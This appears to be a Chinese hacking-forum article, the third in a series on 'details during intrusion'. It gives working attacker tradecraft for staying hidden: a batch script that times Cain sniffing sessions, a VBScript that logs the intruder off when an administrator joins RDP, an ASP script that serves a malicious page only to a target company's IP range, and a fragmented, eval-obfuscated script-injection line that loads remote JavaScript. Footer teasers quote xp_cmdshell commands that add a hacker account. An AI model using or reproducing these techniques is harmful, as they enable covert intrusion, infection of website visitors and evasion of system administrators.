请注意入侵过程中的细节(三)(图)

所属分类: 网络安全 / 黑客入侵 阅读数: 1687
收藏 0 赞 0 分享
前两期中的专栏中,针对细节入侵这一专题,我分别写了我在内网和注入中注意到的一些细节。其实入侵过程中,有时候难免会与管理员面对面,如何更好的隐蔽自己也是很重要的,一旦不注意,入侵工作往往前功尽弃。这期专栏中,我就如何隐蔽自己所做的一些工作,所注意到的细节来写一下。

先来说一下嗅探吧。大家常用的工具是cain,用法大家都会了。但是cain在嗅探过程中,如果遇到流量较大的目标机,往往会把装cain的主机搞死,从而引起管理员的注意。像有的时候,嗅了一阵后,就会把3389搞死。我也没有更好的办法,只能让cain嗅一段时间后停止,再重新开始。如果每次都是手工去停止cain,有时候时间掌握的不及时,3389已经死掉了。其实解决这个问题很简单,一个简单的批处理脚本就可以了。脚本内容如下:

ping 127.0.0.1 -n 5000>nul
taskkill /F /PID 4144

上边批处理脚本中,5000是秒数,用来控制cain的嗅探时间。4144是cain的进程数,可以自己用tasklist查一下就知道了。这样一来,你可以放心在嗅探这段时间内去做别的事了。

再来呢,用cain嗅探一般会在3389上,这时候如果碰到管理员登陆3389也不太好办,我的好友Netpatch写过一个终端监视脚本,一旦发现有两人同时登陆终端的话就注销自己。脚本内容如下:

on error resume next
set arg=wscript.arguments
If arg.count=0 then
wscript.echo "use:// cscript.exe FS.vbs port"
sleep 1000
wscript.quit
End If
Tport=arg(0)
Runs=false
While runs=false
Dim oShell,oExec,strOut,oRegExp,Matches,Match,Num,Tport
Set oShell = WScript.CreateObject("WScript.Shell")
Set oExec = oShell.Exec("netstat -an")
Set oRegExp = new RegExp
oRegExp.Pattern = "TCP[\s] [\d\.] :"&Tport&"[\s] [\d\.] :[\d] [\s] ESTABLISHED"
oRegExp.IgnoreCase = True
oRegExp.Global = True
Do While Not oExec.StdOut.AtEndOfStream
strOut = strOut & oExec.StdOut.ReadLine() & Chr(13) & Chr(10)
Loop
Set Matches = oRegExp.Execute(strOut)
Num = 0
For Each Match In Matches
Num = Num 1
Next
if num > 1 then
Runs=true
oShell.run "logoff"
end if
Set Matches = Nothing
Set oRegExp = Nothing
Set oExec = Nothing
Set oShell = Nothing
wend

用此脚本,登陆终端时打开就可以了,这也是一个比较好的隐藏自己的办法。

最后来说一下挂马。挂马的隐蔽方法也有很多,以前黑手上讲过几期。如果只是盲目的挂马多搞几台肉鸡的话,那个随便你了。但是有时候我们入侵了一个公司的 web站,目标却是他们的内网。这时候你挂马可能会挂出太多的无用机器,如果你知他们公司内网出口的IP段的话,我们可以限制一下IP段使其更有针对性。这个asp脚本如下:
<%
''获取访问者的地址
ip=Request.ServerVariables("REMOTE_ADDR")
'允许的IP地址段为
allowip1="221.221.221.1"
allowip2="221.221.221.254"
if checkip(ip,allowip1,allowip2)=true then
response.write "你挂马的页面"
end if
function checkip(ip,allowip1,allowip2)
dim check(4)
checkip=false
ipstr=split(ip,".")
allow1=split(allowip1,".")
allow2=split(allowip2,".")
if cint(allow1(0))>cint(allow2(0)) then ''判断IP地址段是否合法
response.write "禁止访问"
exit function
end if
for i=0 to ubound(ipstr)
if cint(allow1(i))<cint(allow2(i)) then
if cint(allow1(i))=cint(ipstr(i)) then
check(i)=true
checkip=true
exit for
else
if cint(ipstr(i))<cint(allow2(i)) then
exit for
else
if cint(ipstr(i))>cint(allow2(i)) then
check(i)=false
checkip=false
exit for
else
check(i)=true
checkip=true
end if
end if
end if
else
if cint(allow1(i))>cint(ipstr(i)) or cint(allow1(i))<cint(ipstr(i)) then
check(i)=false
checkip=false
if i<>ubound(ipstr) then
exit for
end if
else
check(i)=true
end if
end if
next
if (check(0)=true and check(1)=true and check(2)=true and check(3)=false) and (cint(allow2(2))>cint(ipstr(2))) then
checkip=true
end if
end function
%>

这个脚本也许考虑得不太周到,但是我觉得足够用了。挂马的隐蔽方法也有很多,我最常用的是代码分隔法。记得剑心有篇文章,提到过最短的跨站方法,我们也可以用这种方法来挂马的。好比常规挂马语句<script src=http://www.110.cn/1.js></script>拆分一下转换为:

<script>z='document.'</script>
<script>z=z 'write("'</script>
<script>z=z '<script'</script>
<script>z=z ' src=ht'</script>
<script>z=z 'tp://ww'</script>
<script>z=z 'w.110'</script>
<script>z=z '.cn/1.'</script>
<script>z=z 'js></sc'</script>
<script>z=z 'ript>")'</script>
<script>eval(z)</script>

这样转换的好处是上边的每一行可以分开插入在同一页面不同行中,这样一来就会隐蔽一点了。当然如何更好的隐蔽自己有很多不同的办法,各人各有巧妙不同。这篇文章只是抛砖引玉,能引起大家的思考我就心满意足了。
更多精彩内容其他人还在看

入侵土耳其网站实例

打开SQL用查询分析器连上,发现了几个数据库估计是服务器的几个网站共用的这一个SQL server 于是立刻本地构造一个注射点,准备列目录。 构造注射点代码如下: <% Set conn = Server.CreateObject("ADODB.Conne
收藏 0 赞 0 分享

MS07-029漏洞利用入侵过程

前言: MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。 今天
收藏 0 赞 0 分享

入侵RedHat Linux系统实例

下 载:http://210.77.146.151/images/hlc/files/seclpd.c 我写此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个
收藏 0 赞 0 分享

记一次曲折的php入侵

闲着无聊就又找了个站来玩玩。随便找了个。点看链接一看php的。。php的就php的吧。反正练习 于是就判断是否存在注入点。 and 1=1 and 1=2 返回不同。判断数据库是否大于4。0.。大于呵呵。可。。正当高行的时候。却发现无法查询。。 以下是代码片段:
收藏 0 赞 0 分享

实例讲解木马的分析方法

以前有过一款国产木马,它有个好听的名字,叫做“广外女生”。这个木马是广东外语外贸大学“广外女生”网络小组的作品,它可以运行于WIN98,WIN98SE,WINME,WINNT,WIN2000或已经安装Winsock2.0的Win95
收藏 0 赞 0 分享

Cmd模式下的入侵技术大全

前言 Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。 本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。 文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如
收藏 0 赞 0 分享

知道对方IP入侵别人的电脑

黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏
收藏 0 赞 0 分享

网络入侵也玩双通道

一个14岁的男孩经过无数次的实验,推出了一款全新的木马——SUF 1.0,该后门运用了“反弹端口原理”与“FTP 隧道技术”,也就是两台机器不直接传输数据,而是利用第三台机器(FTP服务器)来交换数据.
收藏 0 赞 0 分享

通过MSSQL 2000 入侵服务器主机器的命令

首先确保得到数据库超级管理员权限 然后执行如下SQL命令: 1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add' 2、exec master.dbo.xp_cmdshell 'net localgroup
收藏 0 赞 0 分享

phpcms2008 注入漏洞 利用分析

这个是最新有人发现的 该漏洞文件:ask/search_ajax.php 漏洞说明: /ask/search_ajax.php Code: if($q) { $where = " title LIKE '%$q%' AND status = 5&qu
收藏 0 赞 0 分享
查看更多